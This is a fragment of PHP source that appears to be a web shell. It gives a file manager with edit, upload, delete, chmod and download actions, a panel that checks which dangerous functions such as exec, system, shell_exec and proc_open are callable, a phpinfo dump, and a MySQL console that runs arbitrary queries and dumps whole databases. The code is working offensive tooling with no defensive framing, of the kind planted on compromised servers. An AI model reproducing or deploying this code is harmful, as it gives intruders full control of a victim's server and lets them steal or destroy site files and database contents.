$reads[]="<tr sorttable_customkey='3'><td><center><input type='checkbox' name='chk[]' value='".urle($filedir)."' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Open Directory' href='?d=".urle($filedir)."'>".$file."</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($filedir)."' onclick=\"return confirm('Delete Directory [ /".basename($filedir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($filedir)."' title='Modify Folder'>ℳ</a></td></tr>";
$count_dirs++;
}
else
{
$reads[]="<tr sorttable_customkey='4'><td><center><input type='checkbox' name='chk[]' value='".urle($filedir)."' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAABnRSTlMAAAAAAABupgeRAAABHUlEQVR42o2RMW7DIBiF3498iHRJD5JKHurL+CRVBp+i2T16tTynF2gO0KSb5ZrBBl4HHDBuK/WXACH4eO9/CAAAbdvijzLGNE1TVZXfZuHg6XCAQESAZXbOKaXO57eiKG6ft9PrKQIkCQqFoIiQFBGlFIB5nvM8t9aOX2Nd18oDzjnPgCDpn/BH4zh2XZdlWVmWiUK4IgCBoFMUz9eP6zRN75cLgEQhcmTQIbl72O0f9865qLAAsURAAgKBJKEtgLXWvyjLuFsThCSstb8rBCaAQhDYWgIZ7myM+TUBjDHrHlZcbMYYk34cN0YSLcgS+wL0fe9TXDMbY33fR2AYBvyQ8L0Gk8MwREBrTfKe4TpTzwhArXWi8HI84h/1DfwI5mhxJamFAAAAAElFTkSuQmCC'> <a title='View File' href='".$view."'>".$file."</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=e&r=".urle($filedir)."' title='Modify File'>ℳ</a> <a class='action' href='?a=x&r=".urle($filedir)."' onclick=\"return confirm('Delete Filename [ ".basename($filedir)." ] ?');\" title='Delete File'>✘</a> <a class='action' href='?a=d&r=".urle($filedir)."' title='Download File'>➥</a></td></tr>";
$count_files++;
}
}
}
sort($reads);
$filesdirs="";
foreach($reads as $read)
{
$filesdirs.=$read;
}
printf("<div id='action'>
<table><tr>
<td><form class='new' method=POST action='?d=%s'>
<input name='what' type='text' /><input type='submit' name='file' value='New File'/>
</form></td>
<td><form class='new' method=POST action='?d=%s'>
<input name='what' type='text' /><input type='submit' name='directory' value='New Dir'/>
</form></td>
<td><form class='new' method=POST action='?x=find'>
<input type='text' name='find-value' id='find-action'/><input type='submit' name='find-button' value='Find'/>
</form></td>
<td><form class='new' method=POST action='?d=%s&x=upload' enctype='multipart/form-data'>
<input name='what' type='file' class='inputfile'/><input type='submit' name='upload' value='Upload'/>
</form></td>
</tr></table>
</div>
<div id='home'>
<form name='files' method=POST action='?x=action' onclick='checkCount(\"count\")'>
<table class='table sortable'>
<thead>
<tr>
<th class='sorttable_nosort'><input type='checkbox' name='check-all' onclick='checkAll()'/></th>
<th class='sorttable_numeric'>Name</th>
<th>Type</th>
<th>Size</th>
<th>Perms</th>
<th>Owner:Group</th>
<th>Modified</th>
<th>Act.</th>
</tr>
</thead>
<tbody>%s</tbody>
<tFoot>
<tr>
<td colspan='8'>[<span id='count'>0</span>] Selected | Dir's: [%s] File's: [%s]</td>
</tr>
</tFoot>
</table>
<select name='action-value'>
<option value='copy'>Copy</option>
<option value='move'>Move</option>
<option value='delete'>Delete</option>
<option value='zip'>Archive (zip)</option>
<option value='unzip'>Extract to (zip)</option>
</select>
<input type='submit' value='Action' name='action-button' />
</form>
</div>",
urle($dir),
urle($dir),
urle($dir),
$filesdirs,
$count_dirs,
$count_files
);
closedir($handle);
}
else
{
print "<center style='margin-bottom:10px'><b class='off'>Can't Open Location</b></center>";
}
}
if(any("r",$_REQUEST))
{
if(file_exists(urld($_REQUEST["r"])))
{
$file=strval(urld($_REQUEST["r"]));
$status=any("status",$_SESSION)?$_SESSION['status']:"";
$back=php_self."?d=".urle($dir);
printf("<div class='divide'>
<div class='divide-left'>
<table class='table'>
<tr><td>Name</td><td>%s</td></tr>
<tr><td>Size</td><td>%s</td></tr>
<tr><td>Permission</td><td>%s</td></tr>
<tr><td>Create time</td><td>%s</td></tr>
<tr><td>Last modified</td><td>%s</td></tr>
<tr><td>Last accessed</td><td>%s</td></tr>
</table>
</div>
<div class='divide-right'>
<table class='table'>
<tr><td>MIME</td><td>%s</td></tr>
<tr><td>Owner/Group</td><td>%s</td></tr>
<tr><td>MD5</td><td>%s</td></tr>
<tr><td>SHA1</td><td>%s</td></tr>
</table>
</div>
</div>",
basename($file),
GetFileSize(@filesize($file)),
GetFilePerm($file),
GetFileTime($file,"create"),
GetFileTime($file,"modify"),
GetFileTime($file,"access"),
mime_content_type($file),
GetFileOwnerGroup($file),
@md5_file($file),
@sha1_file($file)
);
if(is_file($file)||is_link($file))
{
$menu=array(
"Back" => "?a=b&r=",
"Edit" => "?a=e&r=",
"View" => "?a=v&r=",
"Copy" => "?a=cp&r=",
"Move" => "?a=mv&r=",
"Download" => "?a=d&r=",
"Hexdump" => "?a=h&r=",
"Chmod" => "?a=c&r=",
"Chown" => "?a=cwn&r=",
"Chgrp" => "?a=cgp&r=",
"Touch" => "?a=t&r=",
"Rename" => "?a=r&r=",
"Delete" => "?a=x&r="
);
}
elseif(is_dir($file))
{
$menu=array(
"Back" => "?a=b&r=",
"Chmod" => "?a=c&r=",
"Chown" => "?a=cwn&r=",
"Chgrp" => "?a=cgp&r=",
"Touch" => "?a=t&r=",
"Rename" => "?a=r&r=",
"Delete" => "?a=x&r="
);
}
$nu="";
foreach($menu as $key => $val)
{
$idxkey=substr($val,1,1);
$idxval=substr($val,3,strpos($val,'&')-3);
$active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
if($key=="Delete")
{
$nu.="<li><a ".$active." href='".$val.urle($file)."' onclick=\"return confirm('Delete Filename [ ".basename($file)." ] ?');\">".$key."</a></li>";
}
elseif($key=="Back")
{
$nu.="<li><a ".$active." href='".$back."'>".$key."</a></li>";
}
else
{
$nu.="<li><a ".$active." href='".$val.urle($file)."'>".$key."</a></li>";
}
}
printf("<div class='menu'>
<ul>%s</ul>
</div>",$nu);
if($_REQUEST['a']=='e')
{
$source="";
if(filesize($file) > 5242880)
{
$source.="Lazy to Read more than 5MB Files";
}
else
{
$open=fopen($file,'r');
if($open)
{
while(!feof($open))
{
$source.=htmlentities(fread($open,(1024*4)));
}
fclose($open);
}
}
printf("<form class='frmsource' method='post'>
<textarea id='sourcefocus' name='sourcecode' rows='25' cols='100'>%s</textarea>
<input type='Submit' value='Save file' name='save'/>
<label>%s</label>
</form>",$source,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("save",$_REQUEST))
{
$new_source=$_REQUEST['sourcecode'];
if(function_exists("chmod")) chmod($file,0755);
$source_edit=fopen($file,'w+');
$tulis=fwrite($source_edit,$new_source);
fclose($source_edit);
if($tulis)
{
$_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file));
}
else
{
$_SESSION['status']="Whoops, something went wrong...";
}
header("location:".php_self."?a=e&r=".urle($file));
}
}
if($_REQUEST['a']=='r')
{
printf("<form class='new' method='post'>
<input type='text' name='name' value='%s'/>
<input type='Submit' value='Rename' name='rename'/>
<label>%s</label>
</form>",basename($file),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("rename",$_REQUEST))
{
$path=pathinfo(trim($file));
$newname=$path['dirname']._.trim($_REQUEST['name']);
if(!rename(trim($file),$newname))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Renamed file with success';
}
header("location:".php_self."?a=r&r=".urle($newname));
}
}
if($_REQUEST['a']=='c')
{
printf("<form class='new' method='post'>
<input type='text' name='octal' value='%s'/>
<input type='Submit' value='Chmod' name='chmod'/>
<label>%s</label>
</form>",substr(decoct(fileperms($file)),2),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chmod",$_REQUEST))
{
$octal=octdec($_REQUEST['octal']);
if(!chmod(trim($file),$octal))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chmod file with success';
}
header("location:".php_self."?a=c&r=".urle($file));
}
}
if($_REQUEST['a']=='cwn')
{
$own='';
if(function_exists('posix_getpwuid'))
{
$user=posix_getpwuid(fileowner($x));
$own=$user['name'];
}
printf("<form class='new' method='post'>
<input type='text' name='own' value='%s'/>
<input type='Submit' value='Chown' name='chown'/>
<label>%s</label>
</form>",$own,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chown",$_REQUEST))
{
$own=$_REQUEST['own'];
if(!chown(trim($file),$own))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chown file with success';
}
header("location:".php_self."?a=cwn&r=".urle($file));
}
}
if($_REQUEST['a']=='cgp')
{
$grp='';
if(function_exists('posix_getgrgid'))
{
$group=posix_getgrgid(filegroup($x));
$grp=$group['name'];
}
printf("<form class='new' method='post'>
<input type='text' name='grp' value='%s'/>
<input type='Submit' value='Chgrp' name='chgrp'/>
<label>%s</label>
</form>",$grp,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chgrp",$_REQUEST))
{
$grp=$_REQUEST['grp'];
if(!chgrp(trim($file),$grp))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chgrp file with success';
}
header("location:".php_self."?a=cgp&r=".urle($file));
}
}
if($_REQUEST['a']=='t')
{
printf("<form class='new' method='post'>
<input type='text' name='time' value='%s'/>
<input type='Submit' value='Touch' name='touch'/>
<label>%s</label>
</form>",GetFileTime($file,"modify"),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("touch",$_REQUEST))
{
$time=$_REQUEST['time'];
if(!touch(trim($file),strtotime($time)))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Touched file with success';
}
header("location:".php_self."?a=t&r=".urle($file));
}
}
if($_REQUEST['a']=='v')
{
printf("<div class='menu'>
<ul>
<li><a href='?a=v&r=%s'>Source</a></li>
<li><a href='?a=v&w=f&r=%s'>iFrame</a></li>
<li><a href='?a=v&w=i&r=%s'>Image</a></li>
<li><a href='?a=v&w=v&r=%s'>Video</a></li>
<li><a href='?a=v&w=a&r=%s'>Audio</a></li>
</ul>
</div>",
urle($file),urle($file),
urle($file),urle($file),
urle($file));
if(is_readable($file))
{
if(any("w",$_REQUEST))
{
$url=GetUrlFromPath($file);
$type=pathinfo($url)['extension'];
if($_REQUEST['w']=='f')
{
printf("<center><iframe src='%s' width='100%%' height='325' frameBorder='0'>Suck</iframe><a href='%s' target='_blank'>--> New Tab <--</a></center>",$url,$url);
}
if($_REQUEST['w']=='i')
{
printf("<center><img src='%s' alt=' Not Image'/></center>",$url);
}
if($_REQUEST['w']=='v')
{
printf("<center><video width='640' height='320' controls><source src='%s' type='video/%s'>Suck</video></center>",$url,$type);
}
if($_REQUEST['w']=='a')
{
printf("<center><audio controls><source src='%s' type='audio/%s'>Suck</audio></center>",$url,$type);
}
}
else
{
if(filesize($file) > 5242880)
{
printf("Lazy to Read more than 5MB Files");
}
else
{
$code=highlight_file($file,true);
printf("<div class='highlight'>%s</div>",$code);
}
}
}
}
if($_REQUEST['a']=='h')
{
$c=file_get_contents($file);
$n=0;
$h=array('00000000<br>','','');
$len=strlen($c);
for($i=0;$i<$len;++$i)
{
$h[1].=sprintf('%02X',ord($c[$i])).' ';
switch(ord($c[$i]))
{
case 0: $h[2].=' ';break;
case 9: $h[2].=' ';break;
case 10:$h[2].=' ';break;
case 13:$h[2].=' ';break;
default:$h[2].=$c[$i];break;
}
$n++;
if($n==32)
{
$n=0;
if($i+1 < $len)
{
$h[0].=sprintf('%08X',$i+1).'<br>';
}
$h[1].='<br>';
$h[2].="\n";
}
}
printf("
<div id='hexdump'>
<table class='hexdump'>
<tr>
<td><pre>%s</pre></td>
<td><pre>%s</pre></td>
<td><pre>%s</pre></td>
</tr>
</table>
</div>",$h[0],$h[1],htmlspecialchars($h[2]));
}
if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv')
{
printf("<form class='new' method='post'>
<input type='text' name='file-dest' value='%s'/>
<input type='Submit' value='%s' name='submit'/>
<label>%s</label>
</form>",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("submit",$_REQUEST))
{
$source=$file;
$dest=$_REQUEST['file-dest'];
if(!file_exists($dest))
{
if ($_REQUEST['a']=='cp')
{
if(!copy(trim($source),trim($dest)))
{
$_SESSION['status']='Whoops, cannot copying...';
}
else
{
$_SESSION['status']="Copy file with success <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
}
}
elseif($_REQUEST['a']=='mv')
{
if(!copy(trim($source),trim($dest)))
{
$_SESSION['status']='Whoops, cannot moving...';
}
else
{
if(Remove($source))
{
$_SESSION['status']="Move file with success";
$file=$dest;
}
else
{
$_SESSION['status']='Whoops, just copying...';
}
}
}
}
else
{
$_SESSION['status']="Whoops, File was Exists <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
}
if($_REQUEST['a']=='cp')
{
header("location:".php_self."?a=cp&r=".urle($file));
}
elseif($_REQUEST['a']=='mv')
{
header("location:".php_self."?a=mv&r=".urle($file));
}
}
}
if($_REQUEST['a']=='d')
{
if(file_exists($file))
{
header('Cache-Control:must-revalidate,post-check=0,pre-check=0');
header('Content-Disposition:attachment;filename='.basename($file));
header('Content-Type:application/octet-stream');
header('Content-Description:File Transfer');
header('Content-Transfer-Encoding:binary');
header('Content-Length:'.filesize($file));
header('Pragma:public');
header('Expires:0');
ob_clean();
readfile($file);
exit;
}
}
if($_REQUEST['a']=='x')
{
if(file_exists($file))
{
if(Remove($file))
{
header("location:".$back);
}
}
print '<font class="off">Cannot Delete</font>';
}
}
else
{
print '<font class="off">File Not Found</font>';
}
}
if(any("x",$_REQUEST))
{
if($_REQUEST['x']=="logout")
{
session_destroy();
session_regenerate_id();
header('location:'.php_self);
}
if($_REQUEST['x']=="secure")
{
$disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions"))));
$security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv',
'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open',
'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg',
'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput',
'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open',
'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid',
'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all',
'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file',
'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork',
'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask',
'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited',
'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo',
'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid',
'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close',
'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir',
'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind',
'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair',
'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read',
'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock',
'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server',
'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode');
sort($security);
$fucks=array_unique(array_merge($disable_functions,$security));
$table="";
$enable=0;
$disable=0;
$die=array();
$ready=array();
$off=array();
$total=count($fucks);
foreach($fucks as $fuck)
{
$table.="<tr><td></td><td>$fuck</td><td>";
if(in_array($fuck,$disable_functions))
{
$table.="<center><font color=red>DIE</font></center>";
$die[]=$fuck;
$disable++;
}
else
{
if(function_exists($fuck)||is_callable($fuck))
{
$table.="<center><font color=green>READY</font></center>";
$ready[]=$fuck;
$enable++;
}
else
{
$table.="<center><font color=orange>OFF</font></center>";
$off[]=$fuck;
$disable++;
}
}
$table.="</td></tr>";
}
$risk=($enable/$total)*100;
$secure=($disable/$total)*100;
printf("<h2 style='text-align:center'>Sec. Info v2.0.%s</h2><br>
<h4 style='text-align:center;color:var(--txt-color)'>Risks Rate <font color=red>[%s%%]</font> | Secure Rate <font color=green>[%s%%]</font></h4><br><br>
<div class='auto-number'>
<table class='table sortable'>
<thead>
<tr>
<th class='sorttable_nosort' width='15'>No.</th>
<th>Disable Function</th>
<th>Status</th>
</tr>
</thead>
<tbody>
%s
</tbody>
</table>
<fieldset style='margin-bottom:15px'>
<legend>Ready List</legend>
<textarea>%s</textarea>
</fieldset>
<div class='divide'>
<div class='divide-left'>
<fieldset style='margin-bottom:15px'>
<legend>Off List</legend>
<textarea>%s</textarea>
</fieldset>
</div>
<div class='divide-right'>
<fieldset>
<legend>Die List</legend>
<textarea>%s</textarea>
</fieldset>
</div>
</div>",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', '));
}
if($_REQUEST['x']=="info")
{
printf("<div id='php-configuration'>
<form onsubmit='return false;' class='new'>
<select id='php-config'>
<option value='4'>INFO_CONFIGURATION</option>
<option value='16' selected>INFO_ENVIRONMENT</option>
<option value='32'>INFO_VARIABLES</option>
<option value='8'>INFO_MODULES</option>
<option value='1'>INFO_GENERAL</option>
<option value='2'>INFO_CREDITS</option>
<option value='64'>INFO_LICENSE</option>
<option value='-1'>INFO_ALL</option>
</select>
<input type='submit' onclick=\"return getAjax(true,'php-info','POST','?x=info&xa=envirolment&config='+document.getElementById('php-config').value);\"/><br>
</form>
</div>
<div id='php-info' class='result'></div>");
$cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID',
'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI',
'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON',
'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR',
'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR',
'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR',
'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE');
$table="";
foreach($cores as $core)
{
$table.="<tr><td>".$core."</td><td>".@constant($core)."</td></tr>";
}
printf("<h2>Core Predefined Constants</h2><br>
<table class='table'>
<thead>
<tr>
<th>Predefined Constants</th>
<th>Value</th>
</tr>
<tbody>%s</tbody>
</table>",$table);
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment")
{
ob_clean();
phpinfo($_REQUEST['config']);
$phpinfo=ob_get_contents();
ob_end_clean();
$phpinfo=preg_replace('%^.*<body>(.*)</body>.*$%ms','$1',$phpinfo);
printf("<div id='phpinfo'>%s</div>",$phpinfo);
exit;
}
}
if($_REQUEST['x']=="db")
{
$connect=any("connect",$_SESSION)?$_SESSION['connect']:"";
$status=any("status",$_SESSION)?$_SESSION['status']:"";
$query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;";
if($connect==true)
{
$process="";
$sql=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
/*
$result=mysql_list_processes($sql);
while($row=mysql_fetch_assoc($result))
{
$process.=sprintf("<tr>
<td>%s</td><td>%s</td><td>%s</td>
<td>%s</td><td>%s</td></tr>",
$row["Id"],$row["Host"],$row["db"],
$row["Command"],$row["Time"]);
}
mysql_free_result($result);
*/
printf("<div class='database-session'>
<div class='database-query'>
<form action='?x=db&xa=qry' method='post'>
<label>MYSQL Query<hr></label><br>
<label><i style='color:#222'>
show databases;<br>
show tables from {database};<br>
show columns from {database}.{table};<br>
select count(*) from {database}.{table};<br>
select * from {database}.{table}limit 0,10;</i></label>
<textarea id='query' name='query'>%s</textarea><br>
<input type='submit' name='disconnect' value='Disconnect'/>
<input type='submit' value='Execute'/>
</form>
</div>
<div class='database-process'>
<!-- div class='mysql-process-result'>
<label>Database Process <a href='?x=db&xa=proc'>♻</a><hr></label>
<table class='table table-bordered'>
<thead>
<tr>
<th>Id</th>
<th>Host</th>
<th>Database</th>
<th>Command</th>
<th>Time</th>
</tr>
</thead>
<tbody>%s</tbody>
</table>
</div -->
<div class='database-dump'>
<label>Database Dump<hr></label>
<form action='?x=db&xa=dmp' method='post'><br>
<label>Database</label><input type='text' name='database' value=''/><br>
<label>Output</label><input type='text' name='output' value='%s'/><br>
<input type='submit' value='Dump' />
<label>%s</label>
</form>
</div>
</div>
<div class='clr'></div>
</div>
",$query,$process,$dir,$status);
}
else
{
printf("<div id='database'>
<form action='?x=db&xa=db' method='post' class='new'><br>
<label>Host</label><input type='text' name='host' value='localhost'/><br>
<label>Port</label><input type='text' name='port' value='3306'/><br>
<label>Username</label><input type='text' name='user' value='root'/><br>
<label>Password</label><input type='text' name='pass' value=''/><br>
<label>Database</label><input type='text' name='dbas' value=''/><br>
<input type='submit' value='Connect'/>
</form>
</div>");
}
if(any("rs",$_REQUEST))
{
$_SESSION[$_REQUEST['rs']]='';
}
if(any("cd",$_REQUEST))
{
$_SESSION['qdb']=$_REQUEST['cd'];
}
if(any("ct",$_REQUEST))
{
$_SESSION['qtb']=$_REQUEST['ct'];
}
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db")
{
$cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']);
$_SESSION['host']=$_REQUEST['host'];
$_SESSION['port']=$_REQUEST['port'];
$_SESSION['user']=$_REQUEST['user'];
$_SESSION['pass']=$_REQUEST['pass'];
$_SESSION['dbas']=$_REQUEST['dbas'];
if($cn)
{
$_SESSION['connect']=true;
header('location:'.php_self.'?x=db');
}
else
{
$_SESSION['connect']=false;
printf("<b class='off'>Connection Failed</b>");
}
}
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry")
{
$_SESSION['status']='';
$con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
if(isset($_REQUEST['disconnect']))
{
mysqli_close($con);
unset($_SESSION['connect']);
unset($_SESSION['query']);
unset($_SESSION['host']);
unset($_SESSION['user']);
unset($_SESSION['pass']);
unset($_SESSION['dbas']);
unset($_SESSION['qdb']);
unset($_SESSION['qtb']);
header('location:'.php_self.'?x=db');
}
$sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;";
$result=mysqli_query($con,$sql);
$data=array();
$name=array();
if($result)
{
while($fieldinfo=mysqli_fetch_field($result))
{
$name[]=$fieldinfo->name;
}
$data[]=$name;
while($row=mysqli_fetch_row($result))
{
$data[]=$row;
}
mysqli_free_result($result);
}
else
{
$data=false;
}
if($data!==false)
{
$sqdb=isset($_SESSION['qdb']) ? $_SESSION['qdb'] : '';
$sqtb=isset($_SESSION['qtb']) ? $_SESSION['qtb'] : '';
$bsdb="<a href='?x=db&xa=qry&rs=qdb&query=show databases;'>Database</a>";
$bqdb=!empty($_SESSION['qdb'])?"→ <a href='?x=db&xa=qry&rs=qtb&query=show tables from $sqdb;'>$sqdb</a>":"";
$bqtb=!empty($_SESSION['qtb'])?"→ <a href='?x=db&xa=qry&query=show columns from $sqdb.$sqtb;'>$sqtb</a>":"";
printf("<div class='database=table'>
<div class='database-breadcrumb'>%s %s %s</div>
<div class='auto-number'>
<table class='table sortable'>",$bsdb,$bqdb,$bqtb);
foreach($data as $key => $val)
{
if(is_array($val))
{
if($key==0)
{
print "<tr><th class='sorttable_nosort'>☰</th>";
foreach($val as $key2 => $val2)
{
if(!is_array($val2))
{
print "<th>".$val2."</th>";
}
}
print "</tr>";
}
else
{
print "<tr><td width='15'></td>";
foreach($val as $key3 => $val3)
{
if(!is_array($val3))
{
if(strpos($val2,'Database')!==false)
{
print "<td><a href='?x=db&xa=qry&cd=$val3&query=show tables from $val3;'>$val3</a></td>";
}
elseif(strpos($val2,'Tables')!==false)
{
$val4=substr($val2,strpos($val2,'Tables_in_')+10);
print "<td><a href='?x=db&xa=qry&cd=$val4&ct=$val3&query=select * from $val4.$val3 limit 0,10;'>$val3</a></td>";
}
else
{
print "<td>$val3</td>";
}
}
}
print "</tr>";
}
}
}
print "</table></div></div>";
}
else
{
print '<span class=off>Query not Executed</span>';
}
}
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp")
{
$database=$_REQUEST['database'];
$output=$_REQUEST['output'];
if (!file_exists($output)&&!empty($database))
{
$link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']);
mysqli_set_charset($link,'utf8');
mysqli_select_db($link,$database);
$tables=array();
$result=mysqli_query($link,'SHOW TABLES');
while($row=mysqli_fetch_row($result))
{
$tables[]=$row[0];
}
$return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n";
$return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n";
$return.='SET AUTOCOMMIT=0;' . "\r\n";
$return.='START TRANSACTION;' . "\r\n";
foreach($tables as $table)
{
$result=mysqli_query($link,'SELECT * FROM '.$table);
$num_fields=mysqli_num_fields($result);
$num_rows=mysqli_num_rows($result);
$i_row=0;
$row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table));
$return.="\n\n".$row2[1].";\n\n";
if ($num_rows!==0) {
$row3=@mysqli_fetch_fields($result);
$return.='INSERT INTO '.$table.'( ';
foreach ($row3 as $th)
{
$return.='`'.$th->name.'`,';
}
$return=substr($return,0,-2);
$return.=' ) VALUES';
for ($i=0;$i < $num_fields;$i++)
{
while($row=mysqli_fetch_row($result))
{
$return.="\n(";
for($j=0;$j<$num_fields;$j++)
{
$row[$j]=addslashes($row[$j]);
$row[$j]=preg_replace("#\n#","\\n",$row[$j]);
if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';}
if ($j<($num_fields-1)) { $return.=',';}
}
if (++$i_row==$num_rows) {
$return.=");";
}else {
$return.="),";
}
}
}
}
$return.="\n\n\n";
}
$return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n";
$return.='COMMIT;';
$output=pathinfo($otput)['extension']=='sql'?$output:$output.'.sql';
$handle=fopen($output,'w+');
fwrite($handle,$return);
fclose($handle);
$_SESSION['status']=sprintf("Dump with success... <a href='?a=v&r=%s' target='_blank'>'%s'</a>",urle($output),basename($output));
}
else
{
$_SESSION['status']="<span class=off>Dump Error</span>";
}
header('location:'.php_self.'?x=db');
}
